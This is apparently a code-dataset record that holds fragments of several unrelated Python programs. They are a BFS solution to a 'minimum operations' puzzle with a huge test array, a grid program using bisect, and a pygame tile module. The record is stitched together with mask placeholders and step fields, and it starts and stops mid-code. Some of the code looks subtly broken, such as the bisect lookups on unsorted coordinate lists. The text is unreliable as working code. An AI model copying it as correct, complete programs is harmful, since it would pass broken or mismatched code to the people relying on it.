452350380, -146649749,\n 898255045, 116506422, 671728835, 280507922, -189039799, -565803074,\n -439924663, -14345985, -98428526, 57303809, 424685389, -84977856, -\n 9251973, 998935249, 229402894, -405424548, 448394272, 182149207, -\n 728030940, 347577568, 567511928, -27655302, 400866779, -509269521, \n -580602375, 405956020, -855173313, 258091129, 909162200, -315251598,\n -236890006, -531780379, 342955474, -65890269, -111521851, -\n 139906773, 34939329, 927781348, 300458386, -603518159, 341287362, -\n 234266006, 634183737, 454833275, 79631354, -954691672, 102295826, \n 688738167, -958428411, -293858940, 480440548, 590037773, -365477625,\n -425165732, 170388756, 164258145, -507355122, 44132561, 982798160, \n -101120201, -920959602, -239250887, 534862084, -834736952, -\n 123162323, 389682556, 656996523, 864481760, 381156936, 129520066, -\n 995551618, 106129054, -471580461, 856850511, 653020333, 531769579, \n -190375506, -992983956, 73867968, -931909584, 403329114, -945055546,\n 627782991, -666011011, 214665550, 505169020, 210703185, -591690068,\n 11218620, 790987020, 561646751, -33552011, -407054835, -850936697, \n -838201457, -878394038, -759131062, -857347819, 531582062, \n 941614352, -743754869, 650338718, 178603580, -834368178, -976933957,\n 138667533, 746471721, 551579035, -173400777, -1191455, 320121832, -\n 756997945, 402594806, 934711944, 970489131, -193223639, 276816990, \n 842959026, -799673669, -367385466, 681433973, 468892554, -455199860,\n 393993101, 905435993, 218314965, 284795080, 913357885, -652530417, \n 743455659, 869345718, 808902357, 829820413, 7206928, 544900359, \n 225903242, -507688526, 750219353, -663810717, -643969173, -\n 269151675, 348252329, -144351998, 693995296, -692546103, 869432378,\n 650161259, 568234384, 710782517, 179157604, -446849233, -922615096,\n -61183498, 30945194, 819052356, 467911324, 119876349, 46908453, -\n 420671619, 344944591, 889080726, -619477633, 174882730, 553799129, \n -941691933, 146036558, -116064711, 222282163, -272996845, -\n 147041859, -381977096, -786757040, 229096334, 712541239, 326039628,\n -952490563, -362214129, -680530864, 421358212, -472290821, -\n 331398150, -42297937, -393141325, -467541333, 655524006, 452908624,\n -626562356, -758303565, 338224482, 312047704, 599445442, -328430584,\n 259549134, 838272865, -755896597, -151000710, 607787908, 11870257, \n -680877184, 528161590, 769242561, -447486537, -127579653, 135915595,\n -271181270, 12536315, 693445551, 900639800, -692327759, -671179999,\n 977783490, 935798407, 659688020, -478438023, -852131846, -900332354,\n -71029072, 888095095, 924175448, 430392829, 391195112, 399460998, -\n 173259008, -168543477, -495967896, -697314804, 591126097, 301126906,\n 946273416, -772817341, -996445410, 466876435, -92937212, -226599286,\n 43831927, -588596503, -55759661, 212885530, -805455693, 572269060, \n 415773175, -320900489, -651775079, 5276363, 91615150, -882588415, \n 502210147, -401039810, 26713405, -723806893, 125439289, 472777644, \n 869504248, 967552969, -268043646, -146710780, -511973692, -\n 803204681, -146827180, -453201623, -878534466, 631307563, 507752930,\n -63646026, -348120807, 222898965, -410732708, 617953050, -478244422,\n 877782569, -507956686, -196516478, -477074335, 329039585, -\n 480651334, -890030740, 461391919, -977815738, -943937849, 321402466,\n -588396975, -945139052, 871313567, -484830305, 365305963, 891985414,\n 466048577, 880607400, -245705654, 359506342, -612177301, 840415132,\n 693541406, 707348310, 971762025, -871678269, 897143169, 625100531, \n 743908163, -315815019, -63211252, -962051459, 510469141, 566817231,\n -186207711, 309838979, 101194721, -127111899, -109107404, -\n 702499174, 918781433, 34041307, 927374088, -67369303, -680339659, \n 202481166, -218771120, 329951816, -280782626, -423403505, 619779171,\n -567310903, -660420942, 756801677, 996208091, 822990010, 940351540,\n 1331227, 382201579, 891956260, -894584436, 346600029, 805733487, -\n 691767750, 859030444, 1]\n print(Solution().minimumOperations(nums, 938, 80))\n", "step-4": "<mask token>\nfrom typing import List\nfrom collections import deque\n\n\nclass Solution:\n\n def minimumOperations(self, nums: List[int], start: int, goal: int) ->int:\n que = deque([(start, 0)])\n visited = set()\n while que:\n x, steps = que.popleft()\n for i in nums:\n for t in [x + i, x - i, x ^ i]:\n if t == goal:\n return steps + 1\n if 0 <= t <= 1000 and t not in visited:\n visited.add(t)\n que.append((t, steps + 1))\n return -1\n\n\nif __name__ == '__main__':\n print(Solution().minimumOperations(nums=[2, 4, 12], start=2, goal=12))\n print(Solution().minimumOperations(nums=[3, 5, 7], start=0, goal=-4))\n print(Solution().minimumOperations(nums=[2, 8, 16], start=0, goal=1))\n nums = [-574083075, -393928592, -508025046, 942818778, 355796909, \n 515245901, 40297943, 106087952, 112856312, -516143616, 363801856, \n 431681353, 726373078, 947630603, 357311001, 594181298, -797268217, \n -741740009, 310972287, 588107527, -535699426, 56324906, -77958073, \n 739798122, -839472160, 439902753, -599749231, -378067373, -\n 466272504, -668036170, 404827976, 805486978, -762507067, 726001618,\n -761047930, 574054980, 365793614, 112020312, 612806855, -256862366,\n 174046424, 646109365, 263765015, 952305939, 864217737, -236873371, \n -991807014, 365730786, -908194963, -778205177, -949314048, -\n 636570500, -883257881, 316313456, -846577965, 132287864, -143230736,\n 425542510, -99852882, -845180792, -329895545, 402782707, -52191127,\n -470380017, -788836785, -655887976, -899430590, 481923982, 45348738,\n -595401481, -470990760, -417390352, -570278840, -873871723, -\n 905595403, 276201114, -733014032, 126018863, 452235438, -512574658,\n -172220362, 845468743, -743189114, 597319839, -584451932, 410604481,\n -508885990, -670396751, -765996786, 345814977, -920014372, -\n 826696704, 640912714, 119494504, 745808962, -503060001, -677959595,\n -831428592, 282855843, 150678167, -467803553, -503929808, 636431692,\n -235369757, -964826080, 93942566, -65314422, -385277528, -379647659,\n 601981747, -724269861, -516713072, -487487495, 655771565, 406499531,\n -943540581, -290169291, 438686645, -227355533, -822612523, \n 218329747, -800810927, -944724740, -978181517, 274815523, 296317841,\n 56043572, -712672386, -374759873, 86973233, -246165119, 73819230, -\n 801140338, 414767806, 883318746, -822063159, -705772942, -674915800,\n 710520717, -97115365, 599549847, 115344568, 53002314, 242487774, -\n 665998906, -986068895, -844909606, -515222297, -500827406, \n 317865850, -50395059, 522417393, 51184184, 241544846, -996297136, -\n 227251827, 924359619, 822815774, 149467545, 523511343, 252991991, \n 450254984, -393459583, 617410075, 197030479, -234418418, -256650708,\n 872334551, 779068346, 216294504, -708680875, -171498970, -970211466,\n -176493993, 729939373, -658054782, -342680218, 75508900, -377139149,\n 392008859, 121412250, -163586626, -468148273, 624248706, 50004864, \n -862378428, -849927586, 33598413, -157654824, -229712613, 149116317,\n 183820138, 378717707, -995563605, 777654910, 511275580, -157964872,\n -718605034, -764316227, -225837302, -166208500, -587688677, \n 78982205, -488693575, 667205793, 419165994, 731543316, 97551954, -\n 387317666, -580873271, 533504431, -31624036, -356035140, -849089082,\n -767376392, -625237600, 940717947, -337709497, 915255567, 727274007,\n -879463448, -363148174, -854892492, 110472344, -466194659, -\n 146843198, -454944217, -365338018, -349424052, 994474446, -\n 554968068, -883734951, -697723265, 583756420, -5696410, -413731452,\n -278706136, -399245668, 83345207, -227231270, 618384545, 846514423,\n -556667092, 590460194, -686116067, -509669269, -510065093, 77094171,\n 270317951, 166095128, -918526061, -766370855, -20861321, 478791777,\n 663673443, -152055285, 224745414, 123998803, 66824877, -85117337, \n 212126175, -718523523, 615359230, -212148589, 620733736, -81197397,\n 51814471, 709312024, 562145805, -770811828, 321230393, -611636320, \n -421337549, -804527290, -416739656, -886764000, 170695026, \n 414273830, -449987380, -56782953, 772039002, -961265403, -896009751,\n -524231358, 497253209, -507048459, -308522246, -508249054, -\n 53240581, -241704483, -974133571, 232897679, -152365934, -861310248,\n -305766289, 340680726, 844612779, -180227470, 40798478, 729446447, \n 395975250, -142447074, -606021375, 47555730, 294446347, 452346091, \n -409427076, -845574381, -838995437, 45787728, 714700474, -315824001,\n 694717388, 502723269, 119244099, -538412679, -207297135, -189078560,\n -812610469, -350061253, -73975237, -119323509, 791863263, 741180208,\n 740488891, -475394166, -191585617, -441527154, 767292531, 201222965,\n -150196525, 588513813, 245328283, 396662663, 100705864, 126789247, \n 487161165, -460512081, -469521559, -998848254, -917609155, \n 314537168, 418002454, -926920818, -628671538, 179971032, -105401559,\n 449618919, 823404672, 178494651, -773108884, 10686795, -506642993, \n -60172121, -510142552, 651623281, -163851428, 158562600, -782456228,\n -336697076, -571952851, 849878818, -456510759, -65997243, -\n 506043404, -558981572, 186946604, 124948039, 954065944, 707437320, \n -224056616, -319237038, 512138196, 742466011, -49725596, -784781640,\n -753413026, -331602365, -246166733, -658650959, -4888181, -\n 547553549, 786689548, -866846384, -212028209, -98029403, -325422497,\n -409855095, 320083382, -491251215, -471713326, 890922019, -\n 766590943, -481641953, -227197451, -709166930, -965945544, \n 407688175, -78385698, -372800469, 389036825, 79885300, -858488452, \n -390177477, 233839191, -518116358, 420408256, 872470025, 241770824,\n -106901417, -328631191, 548580365, -88408815, -647601013, 658880218,\n -870455388, 277154380, 370022702, -381519264, -800726224, 183685380,\n 208169777, 925905330, 732494840, 251754641, -681988029, 593628349, \n 153852085, 353590607, 242118102, -788094641, -242801844, 474214244,\n 579450364, 580046580, -269927114, 249739292, 295331955, -544556236,\n -814569172, 808895922, 707421114, 305101587, 621173158, -248896453,\n 988552702, -375313331, -87289858, -796466539, -529411285, -\n 197315984, 33984203, -122839651, -90735568, 277265491, 762059774, -\n 628018119, -406508643, -856856769, 364613737, 59319066, 614382155, \n -614620718, -133957131, -394985422, -29943491, 154443077, -72727846,\n 392096990, 562681453, 364248049, -156700958, 717335155, -343408748,\n 77301840, -155372684, -432114609, 414752267, -485732822, 876096548,\n 842614035, -614245110, -872219121, 291509502, 334817026, 214330487,\n 405297459, -449582485, 789314834, 936409758, 452350380, -146649749,\n 898255045, 116506422, 671728835, 280507922, -189039799, -565803074,\n -439924663, -14345985, -98428526, 57303809, 424685389, -84977856, -\n 9251973, 998935249, 229402894, -405424548, 448394272, 182149207, -\n 728030940, 347577568, 567511928, -27655302, 400866779, -509269521, \n -580602375, 405956020, -855173313, 258091129, 909162200, -315251598,\n -236890006, -531780379, 342955474, -65890269, -111521851, -\n 139906773, 34939329, 927781348, 300458386, -603518159, 341287362, -\n 234266006, 634183737, 454833275, 79631354, -954691672, 102295826, \n 688738167, -958428411, -293858940, 480440548, 590037773, -365477625,\n -425165732, 170388756, 164258145, -507355122, 44132561, 982798160, \n -101120201, -920959602, -239250887, 534862084, -834736952, -\n 123162323, 389682556, 656996523, 864481760, 381156936, 129520066, -\n 995551618, 106129054, -471580461, 856850511, 653020333, 531769579, \n -190375506, -992983956, 73867968, -931909584, 403329114, -945055546,\n 627782991, -666011011, 214665550, 505169020, 210703185, -591690068,\n 11218620, 790987020, 561646751, -33552011, -407054835, -850936697, \n -838201457, -878394038, -759131062, -857347819, 531582062, \n 941614352, -743754869, 650338718, 178603580, -834368178, -976933957,\n 138667533, 746471721, 551579035, -173400777, -1191455, 320121832, -\n 756997945, 402594806, 934711944, 970489131, -193223639, 276816990, \n 842959026, -799673669, -367385466, 681433973, 468892554, -455199860,\n 393993101, 905435993, 218314965, 284795080, 913357885, -652530417, \n 743455659, 869345718, 808902357, 829820413, 7206928, 544900359, \n 225903242, -507688526, 750219353, -663810717, -643969173, -\n 269151675, 348252329, -144351998, 693995296, -692546103, 869432378,\n 650161259, 568234384, 710782517, 179157604, -446849233, -922615096,\n -61183498, 30945194, 819052356, 467911324, 119876349, 46908453, -\n 420671619, 344944591, 889080726, -619477633, 174882730, 553799129, \n -941691933, 146036558, -116064711, 222282163, -272996845, -\n 147041859, -381977096, -786757040, 229096334, 712541239, 326039628,\n -952490563, -362214129, -680530864, 421358212, -472290821, -\n 331398150, -42297937, -393141325, -467541333, 655524006, 452908624,\n -626562356, -758303565, 338224482, 312047704, 599445442, -328430584,\n 259549134, 838272865, -755896597, -151000710, 607787908, 11870257, \n -680877184, 528161590, 769242561, -447486537, -127579653, 135915595,\n -271181270, 12536315, 693445551, 900639800, -692327759, -671179999,\n 977783490, 935798407, 659688020, -478438023, -852131846, -900332354,\n -71029072, 888095095, 924175448, 430392829, 391195112, 399460998, -\n 173259008, -168543477, -495967896, -697314804, 591126097, 301126906,\n 946273416, -772817341, -996445410, 466876435, -92937212, -226599286,\n 43831927, -588596503, -55759661, 212885530, -805455693, 572269060, \n 415773175, -320900489, -651775079, 5276363, 91615150, -882588415, \n 502210147, -401039810, 26713405, -723806893, 125439289, 472777644, \n 869504248, 967552969, -268043646, -146710780, -511973692, -\n 803204681, -146827180, -453201623, -878534466, 631307563, 507752930,\n -63646026, -348120807, 222898965, -410732708, 617953050, -478244422,\n 877782569, -507956686, -196516478, -477074335, 329039585, -\n 480651334, -890030740, 461391919, -977815738, -943937849, 321402466,\n -588396975, -945139052, 871313567, -484830305, 365305963, 891985414,\n 466048577, 880607400, -245705654, 359506342, -612177301, 840415132,\n 693541406, 707348310, 971762025, -871678269, 897143169, 625100531, \n 743908163, -315815019, -63211252, -962051459, 510469141, 566817231,\n -186207711, 309838979, 101194721, -127111899, -109107404, -\n 702499174, 918781433, 34041307, 927374088, -67369303, -680339659, \n 202481166, -218771120, 329951816, -280782626, -423403505, 619779171,\n -567310903, -660420942, 756801677, 996208091, 822990010, 940351540,\n 1331227, 382201579, 891956260, -894584436, 346600029, 805733487, -\n 691767750, 859030444, 1]\n print(Solution().minimumOperations(nums, 938, 80))\n", "step-5": "'''\n-Medium-\n*BFS*\n\nYou are given a 0-indexed integer array nums containing distinct numbers, an integer start, and an integer goal. There is an integer x that is initially set to start, and you want to perform operations on x such that it is converted to goal. You can perform the following operation repeatedly on the number x:\n\nIf 0 <= x <= 1000, then for any index i in the array (0 <= i < nums.length), you can set x to any of the following:\n\nx + nums[i]\nx - nums[i]\nx ^ nums[i] (bitwise-XOR)\nNote that you can use each nums[i] any number of times in any order. Operations that set x to be out of the range 0 <= x <= 1000 are valid, but no more operations can be done afterward.\n\nReturn the minimum number of operations needed to convert x = start into goal, and -1 if it is not possible.\n\n \n\nExample 1:\n\nInput: nums = [2,4,12], start = 2, goal = 12\nOutput: 2\nExplanation: We can go from 2 → 14 → 12 with the following 2 operations.\n- 2 + 12 = 14\n- 14 - 2 = 12\nExample 2:\n\nInput: nums = [3,5,7], start = 0, goal = -4\nOutput: 2\nExplanation: We can go from 0 → 3 → -4 with the following 2 operations. \n- 0 + 3 = 3\n- 3 - 7 = -4\nNote that the last operation sets x out of the range 0 <= x <= 1000, which is valid.\nExample 3:\n\nInput: nums = [2,8,16], start = 0, goal = 1\nOutput: -1\nExplanation: There is no way to convert 0 into 1.\n \n\nConstraints:\n\n1 <= nums.length <= 1000\n-109 <= nums[i], goal <= 109\n0 <= start <= 1000\nstart != goal\nAll the integers in nums are distinct.\n\n\n'''\n\nfrom typing import List\nfrom collections import deque\n\nclass Solution:\n def minimumOperations(self, nums: List[int], start: int, goal: int) -> int:\n \n que = deque([(start,0)]) \n visited = set() \n while que:\n x, steps = que.popleft() \n for i in nums:\n for t in [x+i, x-i, x^i]:\n if t == goal: return steps + 1\n if 0 <= t <= 1000 and t not in visited:\n visited.add(t)\n que.append((t, steps+1))\n return -1\n\n \n\n\n\n \n\n\nif __name__ == \"__main__\":\n print(Solution().minimumOperations(nums = [2,4,12], start = 2, goal = 12))\n print(Solution().minimumOperations(nums = [3,5,7], start = 0, goal = -4))\n print(Solution().minimumOperations(nums = [2,8,16], start = 0, goal = 1))\n nums = [-574083075,-393928592,-508025046,942818778,355796909,515245901,40297943,106087952,112856312,-516143616,363801856,431681353,726373078,947630603,357311001,594181298,-797268217,-741740009,310972287,588107527,-535699426,56324906,-77958073,739798122,-839472160,439902753,-599749231,-378067373,-466272504,-668036170,404827976,805486978,-762507067,726001618,-761047930,574054980,365793614,112020312,612806855,-256862366,174046424,646109365,263765015,952305939,864217737,-236873371,-991807014,365730786,-908194963,-778205177,-949314048,-636570500,-883257881,316313456,-846577965,132287864,-143230736,425542510,-99852882,-845180792,-329895545,402782707,-52191127,-470380017,-788836785,-655887976,-899430590,481923982,45348738,-595401481,-470990760,-417390352,-570278840,-873871723,-905595403,276201114,-733014032,126018863,452235438,-512574658,-172220362,845468743,-743189114,597319839,-584451932,410604481,-508885990,-670396751,-765996786,345814977,-920014372,-826696704,640912714,119494504,745808962,-503060001,-677959595,-831428592,282855843,150678167,-467803553,-503929808,636431692,-235369757,-964826080,93942566,-65314422,-385277528,-379647659,601981747,-724269861,-516713072,-487487495,655771565,406499531,-943540581,-290169291,438686645,-227355533,-822612523,218329747,-800810927,-944724740,-978181517,274815523,296317841,56043572,-712672386,-374759873,86973233,-246165119,73819230,-801140338,414767806,883318746,-822063159,-705772942,-674915800,710520717,-97115365,599549847,115344568,53002314,242487774,-665998906,-986068895,-844909606,-515222297,-500827406,317865850,-50395059,522417393,51184184,241544846,-996297136,-227251827,924359619,822815774,149467545,523511343,252991991,450254984,-393459583,617410075,197030479,-234418418,-256650708,872334551,779068346,216294504,-708680875,-171498970,-970211466,-176493993,729939373,-658054782,-342680218,75508900,-377139149,392008859,121412250,-163586626,-468148273,624248706,50004864,-862378428,-849927586,33598413,-157654824,-229712613,149116317,183820138,378717707,-995563605,777654910,511275580,-157964872,-718605034,-764316227,-225837302,-166208500,-587688677,78982205,-488693575,667205793,419165994,731543316,97551954,-387317666,-580873271,533504431,-31624036,-356035140,-849089082,-767376392,-625237600,940717947,-337709497,915255567,727274007,-879463448,-363148174,-854892492,110472344,-466194659,-146843198,-454944217,-365338018,-349424052,994474446,-554968068,-883734951,-697723265,583756420,-5696410,-413731452,-278706136,-399245668,83345207,-227231270,618384545,846514423,-556667092,590460194,-686116067,-509669269,-510065093,77094171,270317951,166095128,-918526061,-766370855,-20861321,478791777,663673443,-152055285,224745414,123998803,66824877,-85117337,212126175,-718523523,615359230,-212148589,620733736,-81197397,51814471,709312024,562145805,-770811828,321230393,-611636320,-421337549,-804527290,-416739656,-886764000,170695026,414273830,-449987380,-56782953,772039002,-961265403,-896009751,-524231358,497253209,-507048459,-308522246,-508249054,-53240581,-241704483,-974133571,232897679,-152365934,-861310248,-305766289,340680726,844612779,-180227470,40798478,729446447,395975250,-142447074,-606021375,47555730,294446347,452346091,-409427076,-845574381,-838995437,45787728,714700474,-315824001,694717388,502723269,119244099,-538412679,-207297135,-189078560,-812610469,-350061253,-73975237,-119323509,791863263,741180208,740488891,-475394166,-191585617,-441527154,767292531,201222965,-150196525,588513813,245328283,396662663,100705864,126789247,487161165,-460512081,-469521559,-998848254,-917609155,314537168,418002454,-926920818,-628671538,179971032,-105401559,449618919,823404672,178494651,-773108884,10686795,-506642993,-60172121,-510142552,651623281,-163851428,158562600,-782456228,-336697076,-571952851,849878818,-456510759,-65997243,-506043404,-558981572,186946604,124948039,954065944,707437320,-224056616,-319237038,512138196,742466011,-49725596,-784781640,-753413026,-331602365,-246166733,-658650959,-4888181,-547553549,786689548,-866846384,-212028209,-98029403,-325422497,-409855095,320083382,-491251215,-471713326,890922019,-766590943,-481641953,-227197451,-709166930,-965945544,407688175,-78385698,-372800469,389036825,79885300,-858488452,-390177477,233839191,-518116358,420408256,872470025,241770824,-106901417,-328631191,548580365,-88408815,-647601013,658880218,-870455388,277154380,370022702,-381519264,-800726224,183685380,208169777,925905330,732494840,251754641,-681988029,593628349,153852085,353590607,242118102,-788094641,-242801844,474214244,579450364,580046580,-269927114,249739292,295331955,-544556236,-814569172,808895922,707421114,305101587,621173158,-248896453,988552702,-375313331,-87289858,-796466539,-529411285,-197315984,33984203,-122839651,-90735568,277265491,762059774,-628018119,-406508643,-856856769,364613737,59319066,614382155,-614620718,-133957131,-394985422,-29943491,154443077,-72727846,392096990,562681453,364248049,-156700958,717335155,-343408748,77301840,-155372684,-432114609,414752267,-485732822,876096548,842614035,-614245110,-872219121,291509502,334817026,214330487,405297459,-449582485,789314834,936409758,452350380,-146649749,898255045,116506422,671728835,280507922,-189039799,-565803074,-439924663,-14345985,-98428526,57303809,424685389,-84977856,-9251973,998935249,229402894,-405424548,448394272,182149207,-728030940,347577568,567511928,-27655302,400866779,-509269521,-580602375,405956020,-855173313,258091129,909162200,-315251598,-236890006,-531780379,342955474,-65890269,-111521851,-139906773,34939329,927781348,300458386,-603518159,341287362,-234266006,634183737,454833275,79631354,-954691672,102295826,688738167,-958428411,-293858940,480440548,590037773,-365477625,-425165732,170388756,164258145,-507355122,44132561,982798160,-101120201,-920959602,-239250887,534862084,-834736952,-123162323,389682556,656996523,864481760,381156936,129520066,-995551618,106129054,-471580461,856850511,653020333,531769579,-190375506,-992983956,73867968,-931909584,403329114,-945055546,627782991,-666011011,214665550,505169020,210703185,-591690068,11218620,790987020,561646751,-33552011,-407054835,-850936697,-838201457,-878394038,-759131062,-857347819,531582062,941614352,-743754869,650338718,178603580,-834368178,-976933957,138667533,746471721,551579035,-173400777,-1191455,320121832,-756997945,402594806,934711944,970489131,-193223639,276816990,842959026,-799673669,-367385466,681433973,468892554,-455199860,393993101,905435993,218314965,284795080,913357885,-652530417,743455659,869345718,808902357,829820413,7206928,544900359,225903242,-507688526,750219353,-663810717,-643969173,-269151675,348252329,-144351998,693995296,-692546103,869432378,650161259,568234384,710782517,179157604,-446849233,-922615096,-61183498,30945194,819052356,467911324,119876349,46908453,-420671619,344944591,889080726,-619477633,174882730,553799129,-941691933,146036558,-116064711,222282163,-272996845,-147041859,-381977096,-786757040,229096334,712541239,326039628,-952490563,-362214129,-680530864,421358212,-472290821,-331398150,-42297937,-393141325,-467541333,655524006,452908624,-626562356,-758303565,338224482,312047704,599445442,-328430584,259549134,838272865,-755896597,-151000710,607787908,11870257,-680877184,528161590,769242561,-447486537,-127579653,135915595,-271181270,12536315,693445551,900639800,-692327759,-671179999,977783490,935798407,659688020,-478438023,-852131846,-900332354,-71029072,888095095,924175448,430392829,391195112,399460998,-173259008,-168543477,-495967896,-697314804,591126097,301126906,946273416,-772817341,-996445410,466876435,-92937212,-226599286,43831927,-588596503,-55759661,212885530,-805455693,572269060,415773175,-320900489,-651775079,5276363,91615150,-882588415,502210147,-401039810,26713405,-723806893,125439289,472777644,869504248,967552969,-268043646,-146710780,-511973692,-803204681,-146827180,-453201623,-878534466,631307563,507752930,-63646026,-348120807,222898965,-410732708,617953050,-478244422,877782569,-507956686,-196516478,-477074335,329039585,-480651334,-890030740,461391919,-977815738,-943937849,321402466,-588396975,-945139052,871313567,-484830305,365305963,891985414,466048577,880607400,-245705654,359506342,-612177301,840415132,693541406,707348310,971762025,-871678269,897143169,625100531,743908163,-315815019,-63211252,-962051459,510469141,566817231,-186207711,309838979,101194721,-127111899,-109107404,-702499174,918781433,34041307,927374088,-67369303,-680339659,202481166,-218771120,329951816,-280782626,-423403505,619779171,-567310903,-660420942,756801677,996208091,822990010,940351540,1331227,382201579,891956260,-894584436,346600029,805733487,-691767750,859030444,1]\n print(Solution().minimumOperations(nums, 938, 80))", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from bisect import bisect_left as bisect while True: xp, yp = set(), set() veneer = [] W, H = map(int, input().split()) if not W: break N = int(input()) for i in range(N): x1, y1, x2, y2 = map(int, input().split()) veneer.append((x1, y1, x2, y2)) xp.add(x1) xp.add(x2) yp.add(y1) yp.add(y2) xp = list(xp) yp = list(yp) wa = [[0 for x in range(len(xp) + 1)] for y in range(len(yp) + 1)] print() for v in veneer: xi1 = bisect(xp, v[0]) xi2 = bisect(xp, v[1]) yi1 = bisect(yp, v[2]) yi2 = bisect(yp, v[3]) print(xi1, yi1, xi2, yi2) wa[yi1][xi1] += 1 wa[yi2 + 1][xi1] -=1 wa[yi1][xi2 + 1] -=1 mem = [[0 for x in xp] for y in yp] for y, _ in enumerate(yp): for x, _ in enumerate(xp): mem[y][x] += wa[y][x] if y > 0: mem[y][x] += mem[y - 1][x] if x > 0: mem[y][x] += mem[y][x - 1] print(wa[y])
normal
{ "blob_id": "e0fbb5ad6d822230865e34c1216b355f700e5cec", "index": 7822, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile True:\n xp, yp = set(), set()\n veneer = []\n W, H = map(int, input().split())\n if not W:\n break\n N = int(input())\n for i in range(N):\n x1, y1, x2, y2 = map(int, input().split())\n veneer.append((x1, y1, x2, y2))\n xp.add(x1)\n xp.add(x2)\n yp.add(y1)\n yp.add(y2)\n xp = list(xp)\n yp = list(yp)\n wa = [[(0) for x in range(len(xp) + 1)] for y in range(len(yp) + 1)]\n print()\n for v in veneer:\n xi1 = bisect(xp, v[0])\n xi2 = bisect(xp, v[1])\n yi1 = bisect(yp, v[2])\n yi2 = bisect(yp, v[3])\n print(xi1, yi1, xi2, yi2)\n wa[yi1][xi1] += 1\n wa[yi2 + 1][xi1] -= 1\n wa[yi1][xi2 + 1] -= 1\n mem = [[(0) for x in xp] for y in yp]\n for y, _ in enumerate(yp):\n for x, _ in enumerate(xp):\n mem[y][x] += wa[y][x]\n if y > 0:\n mem[y][x] += mem[y - 1][x]\n if x > 0:\n mem[y][x] += mem[y][x - 1]\n print(wa[y])\n", "step-3": "from bisect import bisect_left as bisect\nwhile True:\n xp, yp = set(), set()\n veneer = []\n W, H = map(int, input().split())\n if not W:\n break\n N = int(input())\n for i in range(N):\n x1, y1, x2, y2 = map(int, input().split())\n veneer.append((x1, y1, x2, y2))\n xp.add(x1)\n xp.add(x2)\n yp.add(y1)\n yp.add(y2)\n xp = list(xp)\n yp = list(yp)\n wa = [[(0) for x in range(len(xp) + 1)] for y in range(len(yp) + 1)]\n print()\n for v in veneer:\n xi1 = bisect(xp, v[0])\n xi2 = bisect(xp, v[1])\n yi1 = bisect(yp, v[2])\n yi2 = bisect(yp, v[3])\n print(xi1, yi1, xi2, yi2)\n wa[yi1][xi1] += 1\n wa[yi2 + 1][xi1] -= 1\n wa[yi1][xi2 + 1] -= 1\n mem = [[(0) for x in xp] for y in yp]\n for y, _ in enumerate(yp):\n for x, _ in enumerate(xp):\n mem[y][x] += wa[y][x]\n if y > 0:\n mem[y][x] += mem[y - 1][x]\n if x > 0:\n mem[y][x] += mem[y][x - 1]\n print(wa[y])\n", "step-4": "from bisect import bisect_left as bisect\nwhile True:\n xp, yp = set(), set()\n veneer = []\n W, H = map(int, input().split())\n if not W:\n break\n N = int(input())\n for i in range(N):\n x1, y1, x2, y2 = map(int, input().split())\n veneer.append((x1, y1, x2, y2))\n xp.add(x1)\n xp.add(x2)\n yp.add(y1)\n yp.add(y2)\n xp = list(xp)\n yp = list(yp)\n wa = [[0 for x in range(len(xp) + 1)] for y in range(len(yp) + 1)]\n print()\n for v in veneer:\n xi1 = bisect(xp, v[0])\n xi2 = bisect(xp, v[1])\n yi1 = bisect(yp, v[2])\n yi2 = bisect(yp, v[3])\n print(xi1, yi1, xi2, yi2)\n wa[yi1][xi1] += 1\n wa[yi2 + 1][xi1] -=1\n wa[yi1][xi2 + 1] -=1\n mem = [[0 for x in xp] for y in yp]\n for y, _ in enumerate(yp):\n for x, _ in enumerate(xp):\n mem[y][x] += wa[y][x]\n if y > 0:\n mem[y][x] += mem[y - 1][x]\n if x > 0:\n mem[y][x] += mem[y][x - 1]\n print(wa[y])\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import pygame import utils from random import randint class TileSurface(): tileGroup = pygame.sprite.Group() tileGrid = [] def __init__(self, x, y, width, height): self.x = x self.y = y self.width = width self.height = height self.surface = pygame.Surface((width, height)) def updatePos(self, x, y): self.x = self.x self.y = self.y def generateTiles(self): tiles = [] x = 0 y = 368 for i in range(0, 150): row = [] for j in range(0, 150): newTile = Dirt(x, y, self) newTile.rect.x = x newTile.rect.y = y row.append(newTile) x += 16 x = 0 y += 16 tiles.append(row) self.tileGrid = tiles def drawTiles(self): for i in range(0, len(self.tileGrid)): for j in range(0, len(self.tileGrid[i])): self.tileGrid[i][j].update() class Tile(pygame.sprite.Sprite): x = 0 y = 0 def __init__(self, sprite, x, y, surface): # Call pygame sprite init method super().__init__() self.image = pygame.image.load(sprite).convert_alpha() #load a sprite image self.rect = self.image.get_rect() # set collision rectangle self.x = x self.y = y self.parentSurface = surface self.parentSurface.tileGroup.add(self) def update(self): self.parentSurface.surface.blit(self.image, (self.x, self.y)) class Dirt(Tile): def __init__(self, x, y, surface): spriteVariant = randint(1, 3) super().__init__("./assets/dirt0" + str(spriteVariant) + ".png", x, y, surface) class Air(Tile): def __init__(self, x, y, surface): super().__init__("./assets/air.png", x, y, surface)
normal
{ "blob_id": "0c8eb90c1d8a58f54186a30ce98a67310955a367", "index": 3024, "step-1": "<mask token>\n\n\nclass Tile(pygame.sprite.Sprite):\n <mask token>\n <mask token>\n\n def __init__(self, sprite, x, y, surface):\n super().__init__()\n self.image = pygame.image.load(sprite).convert_alpha()\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.parentSurface = surface\n self.parentSurface.tileGroup.add(self)\n\n def update(self):\n self.parentSurface.surface.blit(self.image, (self.x, self.y))\n\n\nclass Dirt(Tile):\n\n def __init__(self, x, y, surface):\n spriteVariant = randint(1, 3)\n super().__init__('./assets/dirt0' + str(spriteVariant) + '.png', x,\n y, surface)\n\n\nclass Air(Tile):\n\n def __init__(self, x, y, surface):\n super().__init__('./assets/air.png', x, y, surface)\n", "step-2": "<mask token>\n\n\nclass TileSurface:\n <mask token>\n <mask token>\n\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.surface = pygame.Surface((width, height))\n\n def updatePos(self, x, y):\n self.x = self.x\n self.y = self.y\n\n def generateTiles(self):\n tiles = []\n x = 0\n y = 368\n for i in range(0, 150):\n row = []\n for j in range(0, 150):\n newTile = Dirt(x, y, self)\n newTile.rect.x = x\n newTile.rect.y = y\n row.append(newTile)\n x += 16\n x = 0\n y += 16\n tiles.append(row)\n self.tileGrid = tiles\n\n def drawTiles(self):\n for i in range(0, len(self.tileGrid)):\n 